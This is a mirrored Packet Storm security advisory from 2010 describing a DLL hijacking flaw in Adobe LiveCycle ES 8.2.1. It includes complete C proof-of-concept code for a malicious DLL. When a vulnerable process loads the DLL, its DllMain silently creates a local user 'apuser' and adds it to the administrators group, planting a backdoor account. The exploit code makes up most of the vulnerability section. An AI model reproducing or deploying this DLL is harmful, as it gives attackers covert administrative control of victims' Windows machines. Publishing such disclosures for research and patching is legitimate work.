Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAmnPardaz Security Research TeamPACKETSTORM:93812
HistorySep 14, 2010 - 12:00 a.m.

Adobe LiveCycle ES DLL Hijacking

2010-09-1400:00:00
AmnPardaz Security Research Team
packetstormsecurity.com
32
JSON
`##########################www.BugReport.ir########################################  
#  
# AmnPardaz Security Research Team  
#  
# Title: Adobe LiveCycle ES DLL Hijacking Exploit (.dll)  
# Vendor: http://www.adobe.com/products/livecycle/  
# Vulnerable Version: 8.2.1.3144.1.471865  
# Exploitation: Remote Code Execution  
###################################################################################  
  
####################  
- Description:  
####################  
  
Adobe® LiveCycle® Enterprise Suite (ES) software can help you extend   
the value of existing back-end systems by enabling developers to build   
and deploy applications quickly and easily, and by empowering business   
users to manage application environments based on their specific needs.  
With Adobe LiveCycle ES, you can make it easier for people to interact   
with information through intuitive user experiences, improve   
efficiencies through business process automation, and enhance customer   
service through personalized communications management.  
  
  
####################  
- Vulnerability:  
####################  
  
+--> DLL Hijacking  
Compile the exploit and rename to .dll, create a file in the same dir   
with *.tds extension.  
(Vulnerability is discovered by DLLHijackAuditKit v2)  
  
####################  
- Exploits/PoCs:  
####################  
  
//tested on Windows XP SP3  
#include "stdafx.h"  
#include "windows.h"  
#include <cstdlib>  
  
int main()  
{  
system("net user apuser appass /add");  
system("net localgroup administrators apuser /add");  
exit(0);  
return 0;  
}  
  
  
BOOL APIENTRY DllMain( HMODULE hModule,  
DWORD ul_reason_for_call,  
LPVOID lpReserved  
)  
{  
switch (ul_reason_for_call)  
{  
case DLL_PROCESS_ATTACH:  
main();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
  
return TRUE;  
}  
  
####################  
- Solution:  
####################  
  
http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx  
  
####################  
- Original Advisory:  
####################  
  
http://www.bugreport.ir/index_74.htm  
  
####################  
- Credit:  
####################  
AmnPardaz Security Research & Penetration Testing Group  
Contact: admin[4t}bugreport{d0t]ir  
www.BugReport.ir  
www.AmnPardaz.com  
`
JSON